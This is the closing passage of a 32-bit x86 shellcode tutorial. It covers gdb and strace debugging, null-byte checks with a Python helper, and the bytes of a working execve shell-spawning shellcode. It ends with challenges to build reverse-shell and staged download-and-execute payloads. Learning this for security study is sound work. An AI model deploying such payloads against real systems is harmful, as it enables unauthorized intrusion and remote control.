(gdb) set disassembly-flavor intel
(gdb) break *&shellcode # Break at the start of our shellcode array
(gdb) run
(gdb) x/20i $eip # Disassemble next 20 instructions
(gdb) info registers # Show all register values
(gdb) si # Step one instruction
(gdb) x/16xb $esp # Examine 16 bytes at the stack pointer
Using strace
strace shows you every syscall the shellcode makes — invaluable for verifying it's doing what you expect:
$ strace ./test
execve("./test", ["./test"], 0x7fff...) = 0
...
write(1, "Hello World!\n", 13) = 13
exit(0) = ?
Checking for Null Bytes
# Show any instructions containing null bytes
# (-w matches 00 only as a whole word, so addresses such as 8048100 are not flagged)
$ objdump -d shell | grep -w '00'
If you see 00 in the hex dump of any instruction, that instruction needs to be rewritten.
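Grepping a disassembly is a quick visual check; scanning the raw bytes is more exact and extends naturally to other bad characters. Here is a minimal Python sketch, with find_bad_bytes as a hypothetical helper and the byte strings copied from the objdump listings in Chapters 1 and 3.

```python
def find_bad_bytes(code: bytes, bad: bytes = b"\x00") -> list:
    """Return (offset, byte) pairs for every byte of `code` that appears in `bad`."""
    return [(i, b) for i, b in enumerate(code) if b in bad]

# execve shellcode bytes from the Chapter 3 objdump listing
execve_sc = bytes.fromhex(
    "31c031db31c931d250686e2f7368682f2f626989e3505389e1b00bcd80"
)
print(len(execve_sc), find_bad_bytes(execve_sc))        # 29 []

# The naive exit(0) from Chapter 1 fails the same check
naive_exit = bytes.fromhex("b801000000bb00000000cd80")
print([off for off, _ in find_bad_bytes(naive_exit)])   # [2, 3, 4, 6, 7, 8, 9]
```

Passing a larger set, for example bad=b"\x00\x0a\x0d", covers targets that also filter newlines and carriage returns.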
Final Thoughts
Writing shellcode teaches you things that no other exercise can. You learn how the CPU actually executes instructions, how the stack really works, how system calls bridge user space and kernel space, and how strings and data structures look in raw memory. Every byte matters. Every instruction has consequences.
The progression we followed — exit → hello world → shell spawn → bind shell → reverse shell — mirrors how real exploit payloads are built. You start with something simple, verify it works, then add complexity one layer at a time. And at every step, the constraints (no null bytes, position-independent, small size) force you to think creatively about how to achieve your goal within tight limits.
If you want to go deeper, try these challenges:
- Write a reverse shell that avoids all bad characters, not just null bytes (some exploits filter \x0a, \x0d, \xff, etc.)
- Write a staged shellcode: a tiny first stage that downloads and executes a larger second stage
- Port these examples to 64-bit (x86_64 uses syscall instead of int 0x80, and the register convention is different)
- Write shellcode for a different architecture, such as ARM or MIPS
Happy hacking.